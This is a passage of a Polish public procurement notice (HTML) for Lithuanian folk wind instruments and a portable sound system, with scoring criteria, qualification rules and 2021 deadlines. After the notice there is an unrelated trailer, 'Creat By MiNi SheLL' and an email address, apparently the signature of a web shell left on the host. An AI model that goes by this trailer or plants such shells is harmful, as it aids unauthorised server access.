wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1	Zamawiający dokona oceny ofert, które nie zostały odrzucone na podstawie następujących kryteriów oceny ofert:<br/><br/>•	K1. Cena ofertowa (waga kryterium 60%)<br/>•	K2. Gwarancja i rękojmia (waga kryterium 40%)<br/><br/><br/>1)	Cena ofertowa (K1) - waga – 60 %,<br/>Liczba punktów liczona będzie według formuły:<br/>(Cn / Cof.b) x 60 = liczba punktów, gdzie:<br/>Cn – najniższa cena spośród ofert,<br/>Cof.b – cena oferty badanej,<br/>60 – maksymalna ilość punktów, możliwa do uzyskania w ramach tego kryterium<br/><br/><br/>2)	Gwarancja i rękojmia (K2) – waga – 40%<br/>Ocenie podlega okres gwarancji i rękojmi w skali 0, 5, 10, 15, 20, 25, 30, 35, 40 - punktów, przy czym 1% odpowiada 1 pkt<br/><br/>Liczby punktów liczona będzie następująco:<br/>Okres gwarancji i rękojmi liczony jest w pełnych latach, przy czym<br/>a)	za okres udzielenia gwarancji i rękojmi wynoszący 2 lata – 0 punktów,<br/>b)	za okres udzielenia gwarancji i rękojmi wynoszący 3 pełne lata – 5 punktów,<br/>c)	za okres udzielenia gwarancji i rękojmi wynoszący 4 pełne lata – 10 punktów,<br/>d)	za okres udzielenia gwarancji i rękojmi wynoszący 5 pełnych lat – 15 punktów.<br/>e)	za okres udzielenia gwarancji i rękojmi wynoszący 6 pełnych lat – 20 punktów<br/>f)	za okres udzielenia gwarancji i rękojmi wynoszący 7 pełnych lat – 25 punktów<br/>g)	za okres udzielenia gwarancji i rękojmi wynoszący 8 pełnych lat – 30 punktów<br/>h)	za okres udzielenia gwarancji i rękojmi wynoszący 9 pełnych lat – 35 punktów<br/>i)	za okres udzielenia gwarancji i rękojmi wynoszący 10 pełnych lat i więcej – 40 punktów<br/><br/><br/>Punkty będą przyznawana za pełne lata np. za okres gwarancji i rękojmi wynoszący<br/>5 lat i 6 miesięcy – 15 punktów.<br/><br/>Minimalny okres gwarancji i rękojmi wynosi 2 lata. Nie wskazanie okresu gwarancji i rękojmi, lub wskazanie okresu gwarancji i rękojmi krótszego niż 2 lata będzie skutkować odrzuceniem oferty.<br/><br/><br/><br/>Łączną liczbę punktów oferty „W” stanowi suma punktów oferty osiągnięta w każdym z kryteriów oceny:<br/>W = K1+K2<br/>Maksymalna łączna liczba punktów, jaką może uzyskać oferta wynosi 100.<br/>Za najkorzystniejszą, Zamawiający wybierze ofertę, która uzyska największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Skudučiai <br/>	2 (komplety)	Manuał basowy:<br/>•	Drewniane (drewno klonowe)<br/>•	Strojone<br/>•	Ilość: 23 szt. ( dwie oktawy G-f2)<br/>•	Długość: 12cm -27 cm<br/>•	Opakowanie jednorazowe<br/>Birbynė diatoniczna<br/>	2	•	Trzyczęściowy korpus: rurka z drewna klonowego z dziesięcioma otworami, stroik ebonitowy, rożek (róg wołowy pełniący funkcję rezonatora)<br/>•	Długość: 37 cm (+- 2cm)<br/>•	Opakowanie jednorazowe.<br/>Birbynė chromatyczna 2	•	Trzyczęściowy korpus: rurka z drewna klonowego z dziesięcioma otworami z metalowym zaworem, stroik ebonitowy, rożek (róg wołowy pełniący funkcję rezonatora)<br/>•	Długość: 53 cm (+- 2 cm)<br/>•	Futerał czarny obszyty syntetyczna tkaniną.<br/>Birbynė tenorowa<br/>	1	•	Czteroczęściowy korpus: 1 i 2 część stanowi połączona dwuczęściowa drewniana rura o długości 31 cm każda część, z dziesięcioma otworami z metalowym zaworem, stroik ebonitowy, rożek (róg wołowy pełniący funkcję rezonatora)<br/>•	Długość: 75 cm<br/>•	Futerał: czarny obszyty syntetyczną tkaniną.<br/>Birbynė basowa<br/>	1	•	Czteroczęściowy korpus: 1 i 2 część stanowi połączona dwuczęściowa drewniana rura wykonana z drewna klonowego o długości 40 cm każda część, z dziesięcioma otworami i z metalowym zaworem, stroik ebonitowy, rożek (róg wołowy pełniący funkcję rezonatora)<br/>•	Długość: 95 cm<br/>•	Futerał: czarny obszyty syntetyczną tkaniną.<br/>Daudytės (komplet-C,D,E,F,G)<br/>	1	•	Pięć prostych rurowych instrumentów wykonanych z drewna i owiniętych wierzchnią warstwą brzozowej kory<br/>•	Trzyczęściowy korpus: 1 i 2 część stanowi połączona dwuczęściowa drewniana rura, wykonana z drewna jodłowego o długości 31 cm każda część, <br/>•	Trzecia część: stroik z drewna jesionowego, impregnowany konopnym olejem.<br/>•	Długość instrumentów: 140 cm -200 cm.<br/>•	Trzy futerały koloru czarnego wykonane z syntetycznej tkaniny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37314000-2 - Instrumenty dęte</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1	Zamawiający dokona oceny ofert, które nie zostały odrzucone na podstawie następujących kryteriów oceny ofert:<br/><br/>•	K1. Cena ofertowa (waga kryterium 60%)<br/>•	K2. Gwarancja i rękojmia (waga kryterium 40%)<br/><br/><br/>1)	Cena ofertowa (K1) - waga – 60 %,<br/>Liczba punktów liczona będzie według formuły:<br/>(Cn / Cof.b) x 60 = liczba punktów, gdzie:<br/>Cn – najniższa cena spośród ofert,<br/>Cof.b – cena oferty badanej,<br/>60 – maksymalna ilość punktów, możliwa do uzyskania w ramach tego kryterium<br/><br/><br/>2)	Gwarancja i rękojmia (K2) – waga – 40%<br/>Ocenie podlega okres gwarancji i rękojmi w skali 0, 5, 10, 15, 20, 25, 30, 35, 40 - punktów, przy czym 1% odpowiada 1 pkt<br/><br/>Liczby punktów liczona będzie następująco:<br/>Okres gwarancji i rękojmi liczony jest w pełnych latach, przy czym<br/>a)	za okres udzielenia gwarancji i rękojmi wynoszący 2 lata – 0 punktów,<br/>b)	za okres udzielenia gwarancji i rękojmi wynoszący 3 pełne lata – 5 punktów,<br/>c)	za okres udzielenia gwarancji i rękojmi wynoszący 4 pełne lata – 10 punktów,<br/>d)	za okres udzielenia gwarancji i rękojmi wynoszący 5 pełnych lat – 15 punktów.<br/>e)	za okres udzielenia gwarancji i rękojmi wynoszący 6 pełnych lat – 20 punktów<br/>f)	za okres udzielenia gwarancji i rękojmi wynoszący 7 pełnych lat – 25 punktów<br/>g)	za okres udzielenia gwarancji i rękojmi wynoszący 8 pełnych lat – 30 punktów<br/>h)	za okres udzielenia gwarancji i rękojmi wynoszący 9 pełnych lat – 35 punktów<br/>i)	za okres udzielenia gwarancji i rękojmi wynoszący 10 pełnych lat i więcej – 40 punktów<br/><br/><br/>Punkty będą przyznawana za pełne lata np. za okres gwarancji i rękojmi wynoszący<br/>5 lat i 6 miesięcy – 15 punktów.<br/><br/>Minimalny okres gwarancji i rękojmi wynosi 2 lata. Nie wskazanie okresu gwarancji i rękojmi, lub wskazanie okresu gwarancji i rękojmi krótszego niż 2 lata będzie skutkować odrzuceniem oferty.<br/><br/><br/><br/>Łączną liczbę punktów oferty „W” stanowi suma punktów oferty osiągnięta w każdym z kryteriów oceny:<br/>W = K1+K2<br/>Maksymalna łączna liczba punktów, jaką może uzyskać oferta wynosi 100.<br/>Za najkorzystniejszą, Zamawiający wybierze ofertę, która uzyska największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> System nagłośnieniowy typu All in One z powermikserem i dwoma kolumnami głośnikowymi, moduł Bluetooth umożliwiający bezprzewodowe odtwarzanie (np. z telefonu), wyjście na subwoofer z automatycznym filtrem górnoprzepustowym, zasilanie Phantom Power dla mikrofonów pojemnościowych i wysokoimpedancyjny obwód instrumentalny Hi-Z, efekt Reverb – dwa rodzaje, zestaw składa się do postaci walizki ze zintegrowanym uchwytem do przenoszenia lub posiada dedykowany pokrowiec, moc: 560 do 600 W RMS, ośmio do dziesięcio kanałowy mikser [4 XLR / jack 6,3 mm combo, 2 x jack 6,3 mm (line / Hi-Z instrument), 2 x stereo (4 x jack 6,3 mm lub 2 x jack stereo 3,5 mm), 1 x Bluetooth stereo, głośniki: 2 x 10", trzynaście wejść: 4 x XLR / jack combo (mic/line), 2 x jack 6,3 mm (instrumental/line), 4 x jack 6,3 mm, 2 x jack stereo 3,5 mm, Bluetooth (stereo), wyjścia liniowe: 1 x jack stereo 3,5 mm (słuchawki / linia), 1 x jack 6,3 mm (mono), 1 x jack 6,3 mm (subwoofer), złącza głośnikowe: 2 x jack 6,3 mm, kontrolery - osobna regulacja głośności, basów, sopranów i efektu reverb dla każdego kanału, Master Volume, Master Tone, Mic/Line Pad (kanały 1-4), przełącznik Phantom Power, Reverb (wybór typu pogłosu, pokrętła Time i Tone), przełącznik Hi-Z/line, parowanie Bluetooth, regulacja poziomu wyjścia słuchawkowego, obudowa plastik, dwa kable głośnikowe w zestawie, flansza 35 mm, wymiary po złożeniu (szer. x wys. x gł. mm): od 600 do 737 x od 550 do 559 x od 260 do 286, wytrzymała obudowa z tworzywa sztucznego, waga netto 21 do 26 kg.<br/>Mikrofon bezprzewodowy- zestaw. Typ transmisji danych UHF, pasmo 630 – 680 MHz, częstotliwości: 2x100, zakres dynamiki: >90dB, T.H.D: <0,1%, pasmo przenoszenia: 30Hz na 20KHz, zasięg: 60m, mikrofon - dynamiczny, wszechkierunkowy, czułość -71dB ±3dB (0dB=1V/Pa na 1KHz), pasmo przenoszenia: 50Hz-16KHz, impedancja wyjściowa: 600Ω ±30%, nadajnik - moc: 10mW, modulacja: FM, czułość: -94dBm, zasilanie: LR6 (AA) 1,5V x2 (do 8 godzin pracy), odbiornik AC100~240V (50-60Hz), napięcie: 12V, stosunek S/N: >96dB, wyjście niesymetryczne typu jack 6,35mm, wyjście symetryczne: 2x XLR. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">32340000-8 - Mikrofony i głośniki</p> <p class="mb-0">32341000-5 - Mikrofony</p> <p class="mb-0">32342000-2 - Urządzenia głośnikowe</p> <p class="mb-0">37320000-7 - Części i akcesoria do instrumentów muzycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">42 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1	Zamawiający dokona oceny ofert, które nie zostały odrzucone na podstawie następujących kryteriów oceny ofert:<br/><br/>•	K1. Cena ofertowa (waga kryterium 60%)<br/>•	K2. Gwarancja i rękojmia (waga kryterium 40%)<br/><br/><br/>1)	Cena ofertowa (K1) - waga – 60 %,<br/>Liczba punktów liczona będzie według formuły:<br/>(Cn / Cof.b) x 60 = liczba punktów, gdzie:<br/>Cn – najniższa cena spośród ofert,<br/>Cof.b – cena oferty badanej,<br/>60 – maksymalna ilość punktów, możliwa do uzyskania w ramach tego kryterium<br/><br/><br/>2)	Gwarancja i rękojmia (K2) – waga – 40%<br/>Ocenie podlega okres gwarancji i rękojmi w skali 0, 5, 10, 15, 20, 25, 30, 35, 40 - punktów, przy czym 1% odpowiada 1 pkt<br/><br/>Liczby punktów liczona będzie następująco:<br/>Okres gwarancji i rękojmi liczony jest w pełnych latach, przy czym<br/>a)	za okres udzielenia gwarancji i rękojmi wynoszący 2 lata – 0 punktów,<br/>b)	za okres udzielenia gwarancji i rękojmi wynoszący 3 pełne lata – 5 punktów,<br/>c)	za okres udzielenia gwarancji i rękojmi wynoszący 4 pełne lata – 10 punktów,<br/>d)	za okres udzielenia gwarancji i rękojmi wynoszący 5 pełnych lat – 15 punktów.<br/>e)	za okres udzielenia gwarancji i rękojmi wynoszący 6 pełnych lat – 20 punktów<br/>f)	za okres udzielenia gwarancji i rękojmi wynoszący 7 pełnych lat – 25 punktów<br/>g)	za okres udzielenia gwarancji i rękojmi wynoszący 8 pełnych lat – 30 punktów<br/>h)	za okres udzielenia gwarancji i rękojmi wynoszący 9 pełnych lat – 35 punktów<br/>i)	za okres udzielenia gwarancji i rękojmi wynoszący 10 pełnych lat i więcej – 40 punktów<br/><br/><br/>Punkty będą przyznawana za pełne lata np. za okres gwarancji i rękojmi wynoszący<br/>5 lat i 6 miesięcy – 15 punktów.<br/><br/>Minimalny okres gwarancji i rękojmi wynosi 2 lata. Nie wskazanie okresu gwarancji i rękojmi, lub wskazanie okresu gwarancji i rękojmi krótszego niż 2 lata będzie skutkować odrzuceniem oferty.<br/><br/><br/><br/>Łączną liczbę punktów oferty „W” stanowi suma punktów oferty osiągnięta w każdym z kryteriów oceny:<br/>W = K1+K2<br/>Maksymalna łączna liczba punktów, jaką może uzyskać oferta wynosi 100.<br/>Za najkorzystniejszą, Zamawiający wybierze ofertę, która uzyska największą ilość punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie o braku podstaw do wykluczenia</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie o spełnieniu warunków udziału w postępowaniu</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 8.5.	Postanowienia dotyczące wnoszenia oferty wspólnej przez dwa lub więcej podmiotów gospodarczych (konsorcja/spółki cywilne):<br/>6.5.1 Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np. w formie konsorcjum, spółki cywilnej lub innego porozumienia regulującego ich współpracę w celu uzyskania zamówienia), w takim przypadku:<br/>1. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2. przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców występujących wspólnie,<br/>3. jeżeli oferta Wykonawców występujących wspólnie, zostanie wybrana, Zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego umowy regulującej współpracę tych Wykonawców.<br/>4. w odniesieniu do wymagań postawionych przez Zamawiającego, każdy z Wykonawców występujących wspólnie, oddzielnie musi udokumentować, że nie podlega wykluczeniu na podstawie art. 108 i 109 ustawy Prawo zamówień publicznych wymienionych w punkcie 7.3 niniejszej SWZ.<br/>5. oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie.<br/>6.5.2 Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia lub do reprezentowania w postępowaniu i zawarcia umowy, a pełnomocnictwo/upoważnienie do pełnienia takiej funkcji – wystawione zgodnie z wymogami ustawowymi, oprawione elektronicznym podpisem zaufanym, elektronicznym podpisem osobistym, lub elektronicznym podpisem kwalifikowanym przez prawnie upoważnionych przedstawicieli każdego z partnerów – winno być dołączone do oferty.<br/>6.5.3. Oferta winna być podpisana przez każdego partnera lub ustanowionego pełnomocnika.<br/>6.5.4. Ustanowiony pełnomocnik winien być upoważniony do zaciągania zobowiązań i płatności w imieniu każdego partnera, na rzecz każdego z partnerów oraz do wyłącznego występowania w realizacji kontraktu.<br/>Wszystkie podpisy elektroniczne winny zostać złożone przy pomocy programu wskazanego przez dostawcę usługi zaufania wystawiającego certyfikat podpisu kwalifikowanego, osobistego lub zaufanego <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-09 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-08</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-30 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com